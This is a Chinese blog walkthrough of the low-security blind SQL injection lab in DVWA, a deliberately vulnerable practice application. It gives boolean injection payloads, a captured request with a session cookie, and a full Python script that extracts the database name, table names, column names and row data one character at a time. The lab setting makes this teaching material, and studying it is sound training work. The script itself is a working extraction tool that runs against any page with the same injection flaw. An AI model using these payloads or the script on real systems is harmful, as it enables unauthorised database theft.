DVWA SQL Injection (Blind) SQL 盲注 low 级别

最新推荐文章于 2024-04-29 20:55:13 发布
最新推荐文章于 2024-04-29 20:55:13 发布
阅读量1k 收藏 8
点赞数 33
分类专栏: # SQL注入 文章标签: sql 数据库 网络安全 web安全 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134721018
版权

SQL Injection (Blind)

low

根据返回页面判断语句是否正确

当 and 后接的语句为 True(1=1)时,返回 exists

当 and 后接的语句为 False(1=2)时,返回 MISSING

1' and 1=1 #

image-20231115194637588

1' and 1=2 #

image-20231115194805305

漏洞利用

根据语句的布尔值(正确与否),可对数据库名、字段名等信息进行爆破

爆破数据库长度

由于数据库长度比较好判断,进行手工爆破,后面爆破具体库名,表名等操作进行脚本吧爆破

提交以下代码,判断数据库名的长度是否大于十位

1' and length(database())>10 #

返回 missing 页面,说明判断错误,说明数据库名小于等于 10 位

image-20231115204525100

利用二分查找法,判断数据库名长度是否小于五位

1' and length(database())<5 #

返回 missing 页面,说明判断错误,数据库长度在 5-10 位

image-20231115204650787

几 次判断后可知数据库的长度为 8 位,判断正确,返回 exists

1' and length(database())=8 #

image-20231115204931630

脚本准备

获取网站的 Cookie 值,可以 Burpsuite 抓包或者在浏览器中查看

GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+1%3D1+%23&Submit=Submit HTTP/1.1
Host: 10.9.47.241
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.9.47.241/dvwa/vulnerabilities/sqli_blind/?id=1%27&Submit=Submit
Cookie: security=low; recordurl=%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252F%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252F%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252Findex.php%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252F%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252Findex.php%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252F%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252Findex.php%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252Findex.php%253Fa%253D1; PHPSESSID=p3bccgo7m2m8s8ae41pp6fvva1
Upgrade-Insecure-Requests: 1

经测试,发现 SQL 可能会注入用到的符号 "()_.,' =中,

  • 空格被转义成 +
  • , 被转义成 %2C
  • = 被转义成 %3D
  • # 被转义成 %23

构造 payload 时注意转义

image-20231115210133211

构造脚本爆破

采用按位测试的方法substr(),逐个字母进行判断 ,最后爆破出需要的信息

exp

import string
import requests
import urllib.parse

# 对特殊字符转义
def encode(payload):
    payload = payload.replace(" ", "+")
    payload = payload.replace(",", "%2C")
    payload = payload.replace("=", "%3D")
    payload = payload.replace("#", "%23")
    return payload

# 定义字符集
strings = string.digits + string.ascii_letters + '_'
str = []
for i in strings:
    str.append(i)

# 接收传入的盲注页面 url
blind_url = input("输入sql盲注页面 url:")
# 拼接盲注变量
blind_url+="?id="

# 添加 Cookie
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
    "Cookie":  "security=low; recordurl=%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252F%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252F%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252Findex.php%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252F%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252Findex.php%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252F%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252Findex.php%2Chttp%253A%252F%252F10.9.47.241%252Fmetinfo_5.0.4%252Fabout%252Findex.php%253Fa%253D1; PHPSESSID=p3bccgo7m2m8s8ae41pp6fvva1"
}

# 爆破数据库名
def db_name():
    database_name=""
    print("爆破当前数据库****************************************************************************************")

    for i in range(1,9):
        # 每位遍历字母数字下划线
        for j in str:
            payload = f"1' and ascii(substr(database(),{i},1))={ord(j)} #"
            # 对特殊字符转码
            payload = encode(payload)
            attack_url = f"{blind_url}{payload}&Submit=Submit#"
            res = requests.get(url=attack_url,headers=headers)
            if "exists" in res.text:
                print(j,end="")
                break
    print()


def table():
    print("爆破表名*********************************************************************************************")
    for i in range(0, 600):
        # flag 用于避免爆破完每张表的继续进行多余爆破
        flag = 0
        # end 用于避免爆破完表继续进行多余爆破
        end = 0
        # 假设每个表的表名最长30位,每个表名按位查询
        for j in range(1, 30):
            for name_str in str:
                payload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {i},1),{j},1))={ord(name_str)} #"
                # 对特殊字符转码
                payload = encode(payload)
                attack_url = f"{blind_url}{payload}&Submit=Submit#"
                res = requests.get(url=attack_url,headers=headers)
                if "exists" in res.text:
                    if end==0:
                        print(f"[{i + 1}]", end="")
                    print(name_str, end="")
                    # 该表名非空(未达到最大表数量)
                    end = 1
                    break
                elif name_str == '_':
                    flag = 1
                    break
            # 跳出超过表长,跳出循环
            if flag == 1:
                break
        # 爆破的数据表超过最大数量,跳出循环
        if end == 0:
            break
        print()


def column():
    print("爆破字段*********************************************************************************************")
    table_name = input("输入要爆破的表名:")

    # 跑第0-100个字段
    for i in range(0, 100):
        end = 0
        # 假设每个表的字段名最长30位,每个字段名按位查询
        for j in range(1, 30):
            flag = 0
            for name_str in str:
                payload = f"1' and ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name='{table_name}' limit {i},1),{j},1))={ord(name_str)} #"
                # 对特殊字符转码
                payload = encode(payload)
                attack_url = f"{blind_url}{payload}&Submit=Submit#"
                res = requests.get(url=attack_url,headers=headers)
                if "exists" in res.text:
                    if end == 0:
                        print([i + 1], end="")
                    end = 1
                    flag = 1
                    print(name_str, end="")
                    break
            # 超过该字段长度,跳出循环,开始爆破下个字段
            if flag == 0:
                break
        print()
        if end == 0:
            break


def data():
    print("爆破数据*********************************************************************************************")
    table=input("输入要爆破的表名")
    column = input("输入要爆破的字段:")
    # 跑第0-100个用户名
    for i in range(0, 100):
        end = 0
        # 假设每个用户的表名最长100位,每个用户名按位查询
        for j in range(1, 100):
            flag = 0
            for name_str in str:
                payload = f"1' and ascii(substr((select {column} from {table} limit {i},1),{j},1))={ord(name_str)} #"
                # 对特殊字符转码
                payload = encode(payload)
                attack_url = f"{blind_url}{payload}&Submit=Submit#"
                res = requests.get(url=attack_url,headers=headers)
                if "exists" in res.text:
                    end = 1
                    flag = 1
                    print(name_str, end="")
                    break
            if flag == 0:
                break
        print()
        if end == 0:
            break


try:
    db_name()
    table()
    column()
    while(True):
        choice = input("是否爆破其他表(yes or no):")
        if choice=="yes":
            column()
        else:
            break
    data()
    while(True):
        choice = input("是否爆破其他字段(yes or no):")
        if choice=="yes":
            data()
        else:
            break
except:
    print("something error")
    pass

image-20231115230058395

gjl_
关注
  • 33
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVWA下的SQL Injection(Blind)
NWC2017的博客
07-25 2208
DVWA下的盲注
DVWA-SQL InjectionSQL 注入)
weixin_50342860的博客
08-28 325
目录风险lowmediumhigh修复扩展 风险 是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限沦陷)。 手工注入常规思路 判断是否存在注入,注入是字符型还是数字型 猜解SQL查询语句中的字段数 确定回显位置 获取当前数据库 获取数据库中的表 获取表中的字段名 得到数据 low 分析源码,可以看到对前端传入的参数id没有做任何的过滤,明显存在手工注入,直接带入数
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA SQL Injection(blind)(SQL盲注)全等级
柠檬i的博客
12-19 2602
SQL Injection(blind)(盲注) 目录:SQL Injection(blind)(盲注)1. Low2.Medium3.High4.Impossible5.运用sqlmap自动化注入 1. Low 手工注入方法 服务端只会返回不会显示搜索值,此类无回显的SQL注入称作SQL盲注。 本题只会返回用户存在与否,即真假,此类盲注成为布尔(bool)盲注。 注入思路是猜解库表字段和数据的长度,每个猜完长度之后猜解每一位字符的ascii值,然后拼接之后形成字符。 1' and length(datab
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析
最新发布
2401_84253132的博客
04-29 847
这样的话估计不能使用Error注入。结论:字段为2。
DVWA-SQL注入(SQL Injection)低/中/高级别
热门推荐
wangyuxiang946的博客
08-14 1万+
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injection-low级别 SQL注入的low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下 我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏中,由此推断,此关卡使用的请求方式为GET请求,我们直接在输.
DVWA SQL InjectionSQL注入)全等级
柠檬i的博客
12-19 2892
SQL Injection(回显注入) 目录:SQL Injection(回显注入)1. Low2.Medium3. High4.Impossible5.运用sqlmap自动化注入1.查看信息2.查看数据库名3.查看表名4.查看字段名5.查看字段数据登录 注入思路: 是否有注入?有无回显?是字符型还是数字型?
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4494
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWASQL Injection (Blind)
weixin_42075643的博客
02-19 508
SQL Injection(Blind)即SQL盲注,一般注入,hacker可以在页面上看到回显内容,以此判断注入是否成功,而盲注是看不到回显的,甚至无法判断SQL语句是否执行,因此盲注的困难程度比一般注入要难得多。并且随着技术的提升,目前所见的站点大多都是盲注,所以好好掌握吧~ 手工盲注可以提高盲注思维,并且大量的盲注经验才会在以后的渗透之路上越行越远。 这里引用下freebuf大佬的文章内容: 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”.
dvwa靶场SQL Injection (Blind)(sql盲注)全难度教程(附代码分析)
m0_73248913的博客
04-05 570
dvwa sql盲注
DVWA靶场SQL注入(low
qq_61975388的博客
08-17 573
DVWA靶场SQL注入实战
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
SQL盲注medium.pdf
05-13
本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个开源的Web应用安全测试...
网络安全原理与应用:SQL盲注.pptx
05-16
掌握在DVWA平台上进行SQL盲注的方法; SQL盲注 一、SQL盲注 SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连...
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1406
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
DVWAsql注入(low
m0_52923241的博客
03-12 518
SQL injection 先尝试输入1,可以得到正常的回显 尝试输入User ID:1’判断是否存在注入 可以判断出sql 遍历数据库
DVWA学习之SQL Injection(Blind,盲注
weixin_40950781的博客
08-20 806
DVWA学习之SQL Injection(Blind)(SQL 盲注入)SQL Injection(Blind)0x01 SQL Injection(Blind)1. SQL盲注与普通的SQL注入区别2.基于注入点注入分类3.基于提交方式的注入3.基于页面响应方式的盲注分类4.盲注测试思路5.盲注测试流程6.常用判断ID0x02 low级别1.判断是否存在注入,注入的类型2.猜解当前的数据库名称0...
DVWASQL注入(低级)
heyingcheng的博客
11-17 2452
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入。
dvwa sql injection (blind)
03-16
DVWA SQL注入(盲注)是一种攻击技术,利用应用程序中的漏洞,通过注入恶意代码来获取敏感数据或者控制应用程序。在盲注中,攻击者无法直接获取数据库中的数据,而是通过不断尝试不同的注入语句,观察应用程序的反应...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值